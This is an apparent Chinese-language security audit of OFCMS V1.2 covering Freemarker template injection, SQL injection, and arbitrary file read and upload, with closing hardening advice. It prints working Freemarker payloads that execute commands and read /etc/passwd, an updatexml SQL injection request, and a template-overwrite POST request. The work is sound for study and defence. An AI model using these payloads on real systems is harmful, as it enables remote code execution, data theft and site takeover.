OFCMS V1.2 安全漏洞分析与利用指南<\/h1>

一、Freemarker模板注入漏洞<\/h2>

1.1 漏洞发现<\/h3>

组件识别<\/strong>：<\/p>

检查pom.xml<\/code>文件确认是否加载了freemarker组件<\/li>
在后端未编译的HTML文件中查找类似${reroot}<\/code>的Freemarker表达式<\/li> <\/ul> <\/li>
代码定位<\/strong>：<\/p> 搜索关键字"reroot"找到对应代码位置<\/li> 检查是否存在过滤器防护措施<\/li> <\/ul> <\/li> <\/ol> 1.2 漏洞利用POC<\/h3> 命令执行POC：<\/h4> <#assign classLoader=object?api.class.protectionDomain.classLoader> <#assign clazz=classLoader.loadClass("ClassExposingGSON")> <#assign field=clazz?api.getField("GSON")> <#assign gson=field?api.get(null)> <#assign ex=gson?api.fromJson("{}", classLoader.loadClass("freemarker.template.utility.Execute"))> ${ex("open -a Calculator.app")} <\/code><\/pre> <#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","whoami").start()} <\/code><\/pre> <#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe") <\/code><\/pre> <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("open -a Calculator.app") } <\/code><\/pre> 文件读取POC：<\/h4> <#assign is=object?api.class.getResourceAsStream("\/Test.class")>FILE:[<#list 0..999999999 as _> <#assign byte=is.read()> <#if byte == -1> <#break> <\/#if>${byte}, <\/#list>] <\/code><\/pre> <#assign uri=object?api.class.getResource("\/").toURI()> <#assign input=uri?api.create("file:\/\/\/etc\/passwd").toURL().openConnection()> <#assign is=input?api.getInputStream()>FILE:[<#list 0..999999999 as _> <#assign byte=is.read()> <#if byte == -1> <#break> <\/#if>${byte}, <\/#list>] <\/code><\/pre> 二、SQL注入漏洞<\/h2> 2.1 JFinal DB+Record模式分析<\/h3> 安全机制<\/strong>：<\/p> 使用参数化查询防止SQL注入<\/li> 底层使用PreparedStatement处理参数<\/li> SQL语句和参数分开处理<\/li> <\/ul> <\/li> 潜在风险点<\/strong>：<\/p> LIKE子句<\/li> ORDER BY子句<\/li> IN子句<\/li> GROUP BY子句<\/li> <\/ul> <\/li> <\/ol> 2.2 漏洞发现<\/h3> 关键函数搜索<\/strong>：<\/p> Db.query(<\/code><\/li> Db.update(<\/code><\/li> Db.find(<\/code><\/li> Db.deleteById(<\/code><\/li> Db.save(<\/code><\/li> Db.findById(<\/code><\/li> Db.paginate(<\/code><\/li> <\/ul> <\/li> 安全验证<\/strong>：<\/p> 确认是否使用SqlPara<\/code>进行预编译<\/li> 检查参数是否直接拼接SQL语句<\/li> <\/ul> <\/li> <\/ol> 2.3 漏洞复现<\/h3> 漏洞位置<\/strong>：<\/p> SystemGenerateController<\/code>中的create<\/code>方法<\/li> 直接接收并执行sql<\/code>参数<\/li> <\/ul> <\/li> 利用方式<\/strong>：<\/p> <\/li> <\/ol> GET<\/span> \/ofcms_admin\/admin\/system\/generate\/create?sql=update+of_cms_link+set+link_name%3Dupdatexml(1%2Cconcat(0x7e%2C(user()))%2C0)+where+link_id+%3D+4 HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.1.15:8080<\/span> <\/span><\/span><\/code><\/pre>三、任意文件上传与读取漏洞<\/h2> 3.1 任意文件读取<\/h3> 漏洞发现<\/strong>：<\/p> 检查文件读取操作<\/li> 确认路径过滤机制<\/li> <\/ul> <\/li> 关键代码<\/strong>：<\/p> <\/li> <\/ol> File[]<\/span> files =<\/span> pathFile.<\/span>listFiles<\/span>(<\/span>new<\/span> FileFilter()<\/span> {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> boolean<\/span> accept<\/span>(<\/span>File file)<\/span> {<\/span> <\/span><\/span> return<\/span> !<\/span>file.<\/span>isDirectory<\/span>()<\/span> &&<\/span> <\/span><\/span> (<\/span>file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".html"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".xml"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".css"<\/span>)<\/span> ||<\/span> <\/span><\/span> file.<\/span>getName<\/span>().<\/span>endsWith<\/span>(<\/span>".js"<\/span>));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>});<\/span> <\/span><\/span>String fileContent =<\/span> FileUtils.<\/span>readString<\/span>(<\/span>editFile);<\/span> <\/span><\/span><\/code><\/pre> 利用方式<\/strong>：通过构造请求读取web.xml等关键文件<\/li> dir_name<\/code>参数可有可无<\/li> <\/ul> <\/li> <\/ol> 3.2 任意文件上传<\/h3> 漏洞发现<\/strong>：<\/p> 检查文件写入操作<\/li> 确认文件名和内容控制点<\/li> <\/ul> <\/li> 关键代码<\/strong>：<\/p> <\/li> <\/ol> String fileName =<\/span> getPara(<\/span>"file_name"<\/span>);<\/span> <\/span><\/span>String fileContent =<\/span> getRequest().<\/span>getParameter<\/span>(<\/span>"file_content"<\/span>);<\/span> <\/span><\/span>fileContent =<\/span> fileContent.<\/span>replace<\/span>(...);<\/span> <\/span><\/span>File file =<\/span> new<\/span> File(<\/span>pathFile,<\/span> fileName);<\/span> <\/span><\/span>FileUtils.<\/span>writeString<\/span>(<\/span>file,<\/span> fileContent);<\/span> <\/span><\/span><\/code><\/pre> 路径控制<\/strong>：<\/li> <\/ol> if<\/span>(<\/span>"res"<\/span>.<\/span>equals<\/span>(<\/span>resPath)){<\/span> <\/span><\/span> pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplateResourcePath<\/span>());<\/span> <\/span><\/span>}<\/span> else<\/span> {<\/span> <\/span><\/span> pathFile =<\/span> new<\/span> File(<\/span>SystemUtile.<\/span>getSiteTemplatePath<\/span>());<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre> 防护措施<\/strong>：<\/p> 过滤..\/<\/code>字符<\/li> 后端规定目录位置<\/li> <\/ul> <\/li> 利用方式<\/strong>：<\/p> <\/li> <\/ol> POST<\/span> \/ofcms_admin\/admin\/cms\/template\/save HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> 192.168.1.15:8080<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span> <\/span><\/span>dirs=%2F&res_path=&file_name=list.html&file_content=123 <\/span><\/span><\/code><\/pre>四、防护建议<\/h2> Freemarker防护<\/strong>：<\/p> 限制模板中可调用的Java类和方法<\/li> 使用安全的Freemarker配置<\/li> <\/ul> <\/li> SQL注入防护<\/strong>：<\/p> 严格使用参数化查询<\/li> 对特殊SQL子句进行额外验证<\/li> <\/ul> <\/li> 文件操作防护<\/strong>：<\/p> 实施严格的路径校验<\/li> 限制可操作的文件类型<\/li> 使用白名单机制控制可访问目录<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 对所有用户输入进行严格验证<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> <\/ol>